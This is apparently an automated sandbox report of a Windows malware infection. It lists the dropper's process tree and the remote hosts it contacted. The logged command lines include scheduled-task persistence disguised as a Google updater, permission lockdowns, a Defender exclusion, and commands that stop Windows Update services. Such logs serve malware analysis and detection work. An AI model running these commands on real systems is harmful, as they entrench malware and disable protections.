Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

"C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe"

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

"C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe"

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

"C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe"

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

"C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe"

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

"C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe"

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

"C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe"

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

"C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe"

C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

"C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe"

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

"C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe"

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

"C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\6a32e694-ce15-4166-b5d5-39601b8b4741" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef64d9758,0x7fef64d9768,0x7fef64d9778

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 268

C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe

"C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 268

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Users\Admin\Pictures\Minor Policy\05i4TLYHZEFYjn7jxbwobpPC.exe

"C:\Users\Admin\Pictures\Minor Policy\05i4TLYHZEFYjn7jxbwobpPC.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BAA8.tmp\C469.tmp\C46A.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:340993 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2396 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2636 CREDAT:275457 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1344 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1216 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1304,i,3376028010438598253,6082975748191350444,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1304,i,3376028010438598253,6082975748191350444,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1392 --field-trial-handle=1324,i,6085867165921108108,2268449169252094913,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1216 --field-trial-handle=1324,i,6085867165921108108,2268449169252094913,131072 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2152 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2164 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x12c,0x130,0x134,0x100,0x138,0x7fef64d9758,0x7fef64d9768,0x7fef64d9778

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2180 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kfbfjf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\C8F.exe

C:\Users\Admin\AppData\Local\Temp\C8F.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2192 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\9C7F.exe

C:\Users\Admin\AppData\Local\Temp\9C7F.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AF83.bat" "

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\LZ2mp1sb.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\LZ2mp1sb.exe

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\BEFF.exe

C:\Users\Admin\AppData\Local\Temp\BEFF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\12D.exe

C:\Users\Admin\AppData\Local\Temp\12D.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vb8xx3DB.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vb8xx3DB.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 196

Network

Country Destination Domain Proto
US 8.8.8.8:53 yandex.ru udp
RU 77.88.55.88:443 yandex.ru tcp
US 34.117.59.81:443 ipinfo.io tcp
US 172.67.75.166:443 db-ip.com tcp
US 104.18.146.235:80 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 elijahdiego.top udp
BG 193.42.32.118:80 193.42.32.118 tcp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:443 google.com tcp
US 188.114.96.0:443 api.2ip.ua tcp
DE 45.132.1.20:80 elijahdiego.top tcp
RU 93.186.225.194:443 vk.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
BG 171.22.28.226:80 171.22.28.226 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 www.microsoft.com udp
BG 171.22.28.226:80 171.22.28.226 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 185.225.75.171:22233 tcp
GB 145.239.200.147:30225 tcp
NL 194.169.175.232:45451 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 45.15.156.229:80 45.15.156.229 tcp
RU 93.186.225.194:80 vk.com tcp
DE 45.9.74.80:80 45.9.74.80 tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
RU 95.142.206.1:443 sun6-21.userapi.com tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
BG 193.42.32.118:80 193.42.32.118 tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 104.244.42.1:443 twitter.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
FI 77.91.124.55:19071 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
BG 193.42.32.118:80 193.42.32.118 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 45.15.156.229:80 45.15.156.229 tcp
US 188.114.96.0:443 api.2ip.ua tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 www.facebook.com udp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 galandskiyher5.com udp
NL 194.169.175.127:80 galandskiyher5.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 foxandcatbet.org udp
US 172.67.142.109:443 foxandcatbet.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 rangeroverfan.org udp
US 188.114.97.0:443 rangeroverfan.org tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
RU 79.137.192.18:80 79.137.192.18 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 www.facebook.com udp
US 104.244.42.1:443 twitter.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
